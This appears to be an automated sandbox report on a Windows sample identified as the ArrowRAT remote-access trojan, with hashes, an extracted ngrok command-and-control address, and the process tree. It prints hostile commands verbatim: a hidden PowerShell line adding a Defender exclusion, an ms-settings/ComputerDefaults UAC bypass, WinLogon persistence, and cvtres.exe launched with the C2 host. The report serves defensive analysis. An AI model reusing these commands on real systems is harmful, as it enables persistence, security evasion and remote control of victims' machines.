Analysis
-
max time kernel
0s -
max time network
1s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
02-09-2024 17:57
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Client.exe
Resource
win10v2004-20240802-en
General
-
Target
Client.exe
-
Size
158KB
-
MD5
330f9ca88df2bb08b5d92df02830a8ab
-
SHA1
1d94ac49a57ea8c5a77c15b0f9252528f4d429f9
-
SHA256
8a032aa8eba9f5f0727f26ec74ca3dff029955ae6be9c1e7b7a7a84c41820910
-
SHA512
aa8d9d9fe801315472bfaada35a56dfc6c64ba0d7cfd9a467858eb2797e365bbc69de4c2afba5667abf6304a266dbeed1a8e13b39a86d2c6b884d12069113f39
-
SSDEEP
3072:gbzRH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfP+iO8Y:gbzRe0ODhTEPgnjuIJzo+PPcfP+d8
Malware Config
Extracted
arrowrat
Client
6.tcp.eu.ngrok.io:13114:4444
IpVAZHAys
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Client.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\Pan\\dora" Client.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 6 IoCs
Processes:
Client.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute Client.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open\command Client.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings Client.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell Client.exe Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Roaming\\Pan\\dora'" Client.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
Client.exepid process 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe 2136 Client.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
Client.exeexplorer.exedescription pid process Token: SeDebugPrivilege 2136 Client.exe Token: SeShutdownPrivilege 2856 explorer.exe Token: SeShutdownPrivilege 2856 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Client.exepid process 2136 Client.exe -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
Client.exeexplorer.exedescription pid process target process PID 2136 wrote to memory of 2856 2136 Client.exe explorer.exe PID 2136 wrote to memory of 2856 2136 Client.exe explorer.exe PID 2136 wrote to memory of 2856 2136 Client.exe explorer.exe PID 2136 wrote to memory of 2864 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2864 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2864 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2864 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2700 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2700 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2700 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2700 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2688 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2688 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2688 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2688 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2672 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2672 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2672 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2672 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2556 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2556 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2556 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2556 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2120 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2120 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2120 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2120 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2940 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2940 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2940 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2940 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2836 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2836 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2836 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2836 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2808 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2808 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2808 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2808 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2748 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2748 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2748 2136 Client.exe cvtres.exe PID 2136 wrote to memory of 2748 2136 Client.exe cvtres.exe PID 2856 wrote to memory of 2576 2856 explorer.exe ctfmon.exe PID 2856 wrote to memory of 2576 2856 explorer.exe ctfmon.exe PID 2856 wrote to memory of 2576 2856 explorer.exe ctfmon.exe PID 2136 wrote to memory of 2720 2136 Client.exe ComputerDefaults.exe PID 2136 wrote to memory of 2720 2136 Client.exe ComputerDefaults.exe PID 2136 wrote to memory of 2720 2136 Client.exe ComputerDefaults.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Modifies WinLogon for persistence
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:2576
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io:13114 4444 IpVAZHAys2⤵PID:2864
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io:13114 4444 IpVAZHAys2⤵PID:2700
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io:13114 4444 IpVAZHAys2⤵PID:2688
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io:13114 4444 IpVAZHAys2⤵PID:2672
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io:13114 4444 IpVAZHAys2⤵PID:2556
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io:13114 4444 IpVAZHAys2⤵PID:2120
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io:13114 4444 IpVAZHAys2⤵PID:2940
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io:13114 4444 IpVAZHAys2⤵PID:2836
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io:13114 4444 IpVAZHAys2⤵PID:2808
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 6.tcp.eu.ngrok.io:13114 4444 IpVAZHAys2⤵PID:2748
-
-
C:\Windows\System32\ComputerDefaults.exe"C:\Windows\System32\ComputerDefaults.exe"2⤵PID:2720
-